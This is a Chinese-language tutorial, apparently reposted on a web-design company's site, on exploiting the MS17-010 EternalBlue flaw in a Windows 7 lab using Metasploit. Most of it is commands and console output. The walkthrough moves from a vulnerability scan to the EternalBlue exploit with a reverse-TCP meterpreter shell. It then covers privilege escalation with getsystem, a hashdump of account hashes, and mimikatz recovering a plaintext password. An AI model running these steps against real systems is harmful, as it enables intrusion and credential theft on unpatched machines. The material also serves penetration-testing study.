ms17-010漏洞利用教程

主要是方便自己之后忘了，而寫的，大佬繞過，大佬繞過，大佬繞過，重要的說三遍。哈哈

目前成都創(chuàng)新互聯(lián)已為超過千家的企業(yè)提供了網(wǎng)站建設(shè)、域名、網(wǎng)頁空間、網(wǎng)站托管、服務(wù)器租用、企業(yè)網(wǎng)站設(shè)計(jì)、尖草坪網(wǎng)站維護(hù)等服務(wù)，公司將堅(jiān)持客戶導(dǎo)向、應(yīng)用為本的策略，正道將秉承"和諧、參與、激情"的文化，與客戶和合作伙伴齊心協(xié)力一起成長(zhǎng)，共同發(fā)展。

***機(jī)：

IP地址：192.168.10.15

系統(tǒng)：kali linux

靶機(jī)：

IP地址：192.168.10.13

系統(tǒng)：win7

啟動(dòng)metasploit-framework

~# msfconsole

ms17-010漏洞利用教程

查找需要用到的***模塊：

msf > search ms17-010

Matching Modules

================

Name Disclosure Date Rank Description

---- --------------- ---- -----------

auxiliary/admin/smb/ms17_010_command 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution

auxiliary/scanner/smb/smb_ms17_010 normal MS17-010 SMB RCE Detection

exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

exploit/windows/smb/ms17_010_psexec 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

先用輔助模塊auxiliary/scanner/smb/smb_ms17_010，檢測(cè)目標(biāo)系統(tǒng)是否存在這個(gè)漏洞

msf > use auxiliary/scanner/smb/smb_ms17_010

msf auxiliary(scanner/smb/smb_ms17_010) > options 查看需要設(shè)置那些參數(shù)，看required，如果下面是yes就必須設(shè)置

Module options (auxiliary/scanner/smb/smb_ms17_010):

Name Current Setting Required Description

---- --------------- -------- -----------

CHECK_ARCH true no Check for architecture on vulnerable hosts

CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts

CHECK_PIPE false no Check for named pipe on vulnerable hosts

NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check

RHOSTS yes The target address range or CIDR identifier

RPORT 445 yes The SMB service port (TCP)

SMBDomain . no The Windows domain to use for authentication

SMBPass no The password for the specified username

SMBUser no The username to authenticate as

THREADS 1 yes The number of concurrent threads

msf auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.10.13 ####大部分參數(shù)已經(jīng)默認(rèn)，只需要設(shè)置rhosts即可

rhosts => 192.168.10.13

msf auxiliary(scanner/smb/smb_ms17_010) > run ###執(zhí)行可以看到返回可能存在ms17-010漏洞

[+] 192.168.10.13:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

使用exploit模塊：

msf auxiliary(scanner/smb/smb_ms17_010) > back 返回上層用back，不用也可以直接選擇另一個(gè)模塊，只是說一下

msf >

msf > use exploit/windows/smb/ms17_010_eternalblue

msf exploit(windows/smb/ms17_010_eternalblue) > options ###查看需要設(shè)置參數(shù)

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description

---- --------------- -------- -----------

GroomAllocations 12 yes Initial number of times to groom the kernel pool.

GroomDelta 5 yes The amount to increase the groom count by per try.

MaxExploitAttempts 3 yes The number of times to retry the exploit.

ProcessName spoolsv.exe yes Process to inject payload into.

RHOST yes The target address

RPORT 445 yes The target port (TCP)

SMBDomain . no (Optional) The Windows domain to use for authentication

SMBPass no (Optional) The password for the specified username

SMBUser no (Optional) The username to authenticate as

VerifyArch true yes Check if remote architecture matches exploit Target.

VerifyTarget true yes Check if remote OS matches exploit Target.

Exploit target:

Id Name

-- ----

0 Windows 7 and Server 2008 R2 (x64) All Service Packs

msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.10.13 #####設(shè)置靶機(jī)ip

RHOST => 192.168.10.13

msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp ###設(shè)置payload如果是32位系統(tǒng)就用windows/meterpreter/reverse_tcp

payload => windows/x64/meterpreter/reverse_tcp

msf exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description

---- --------------- -------- -----------

GroomAllocations 12 yes Initial number of times to groom the kernel pool.

GroomDelta 5 yes The amount to increase the groom count by per try.

MaxExploitAttempts 3 yes The number of times to retry the exploit.

ProcessName spoolsv.exe yes Process to inject payload into.

RHOST 192.168.10.13 yes The target address

RPORT 445 yes The target port (TCP)

SMBDomain . no (Optional) The Windows domain to use for authentication

SMBPass no (Optional) The password for the specified username

SMBUser no (Optional) The username to authenticate as

VerifyArch true yes Check if remote architecture matches exploit Target.

VerifyTarget true yes Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)

LHOST yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Windows 7 and Server 2008 R2 (x64) All Service Packs

msf exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.10.15 ####設(shè)置本地主機(jī)

lhost => 192.168.10.15

msf exploit(windows/smb/ms17_010_eternalblue) > run ####執(zhí)行

[*] Started reverse TCP handler on 192.168.10.15:4444

[*] 192.168.10.13:445 - Connecting to target for exploitation.

[+] 192.168.10.13:445 - Connection established for exploitation.

[+] 192.168.10.13:445 - Target OS selected valid for OS indicated by SMB reply

[*] 192.168.10.13:445 - CORE raw buffer dump (38 bytes)

[*] 192.168.10.13:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima

[*] 192.168.10.13:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service

[*] 192.168.10.13:445 - 0x00000020 50 61 63 6b 20 31 Pack 1

[+] 192.168.10.13:445 - Target arch selected valid for arch indicated by DCE/RPC reply

[*] 192.168.10.13:445 - Trying exploit with 12 Groom Allocations.

[*] 192.168.10.13:445 - Sending all but last fragment of exploit packet

[*] 192.168.10.13:445 - Starting non-paged pool grooming

[+] 192.168.10.13:445 - Sending SMBv2 buffers

[+] 192.168.10.13:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

[*] 192.168.10.13:445 - Sending final SMBv2 buffers.

[*] 192.168.10.13:445 - Sending last fragment of exploit packet!

[*] 192.168.10.13:445 - Receiving response from exploit packet

[+] 192.168.10.13:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!

[*] 192.168.10.13:445 - Sending egg to corrupted connection.

[*] 192.168.10.13:445 - Triggering free of corrupted buffer.

[-] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[-] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 中間可能會(huì)失敗，耐心點(diǎn)。

[-] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[*] 192.168.10.13:445 - Connecting to target for exploitation.

[+] 192.168.10.13:445 - Connection established for exploitation.

[+] 192.168.10.13:445 - Target OS selected valid for OS indicated by SMB reply

[*] 192.168.10.13:445 - CORE raw buffer dump (38 bytes)

[*] 192.168.10.13:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima

[*] 192.168.10.13:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service

[*] 192.168.10.13:445 - 0x00000020 50 61 63 6b 20 31 Pack 1

[+] 192.168.10.13:445 - Target arch selected valid for arch indicated by DCE/RPC reply

[*] 192.168.10.13:445 - Trying exploit with 17 Groom Allocations.

[*] 192.168.10.13:445 - Sending all but last fragment of exploit packet

[*] 192.168.10.13:445 - Starting non-paged pool grooming

[+] 192.168.10.13:445 - Sending SMBv2 buffers

[+] 192.168.10.13:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

[*] 192.168.10.13:445 - Sending final SMBv2 buffers.

[*] 192.168.10.13:445 - Sending last fragment of exploit packet!

[*] 192.168.10.13:445 - Receiving response from exploit packet

[+] 192.168.10.13:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!

[*] 192.168.10.13:445 - Sending egg to corrupted connection.

[*] 192.168.10.13:445 - Triggering free of corrupted buffer.

[*] Sending stage (206403 bytes) to 192.168.10.13

[*] Meterpreter session 1 opened (192.168.10.15:4444 -> 192.168.10.13:49341) at 2018-05-13 10:17:45 +0800

[+] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[+] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[+] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > 拿到一個(gè)反彈的meterpreter

***后的提權(quán)：

meterpreter > sysinfo 查看系統(tǒng)后的信息

Computer : INI-PC

OS : Windows 7 (Build 7601, Service Pack 1).

Architecture : x64

System Language : zh_CN

Domain : WORKGROUP

Logged On Users : 2

Meterpreter : x64/windows

meterpreter > getsystem ===》####用這個(gè)提權(quán)比較順利，有時(shí)候這個(gè)提權(quán)可能提權(quán)不了，還可以通過繞過UAC進(jìn)行提權(quán)，可以參考：http://netsecurity.51cto.com/art/201612/524691.htm

...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

抓取用戶的密碼：

meterpreter > hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:9f22bada0de76a5744d444632dafa2a7:::

ini:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

meterpreter > load mimikatz 加載密碼提取神器，哈哈

Loading extension mimikatz...Success.

meterpreter > kerberos

[+] Running as SYSTEM

[*] Retrieving kerberos credentials

kerberos credentials

====================

AuthID Package Domain User Password

------ ------- ------ ---- --------

0;997 Negotiate NT AUTHORITY LOCAL SERVICE

0;996 Negotiate WORKGROUP INI-PC$

0;47944 NTLM

0;999 NTLM WORKGROUP INI-PC$

0;114022 NTLM ini-PC ini 123456

0;113976 NTLM ini-PC ini 123456 ###得到用戶的密碼

網(wǎng)站標(biāo)題：ms17-010漏洞利用教程
本文地址：http://bm7419.com/article10/ipdogo.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供Google、外貿(mào)建站、微信公眾號(hào)、搜索引擎優(yōu)化、App開發(fā)、品牌網(wǎng)站建設(shè)

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源：創(chuàng)新互聯(lián)

猜你還喜歡下面的內(nèi)容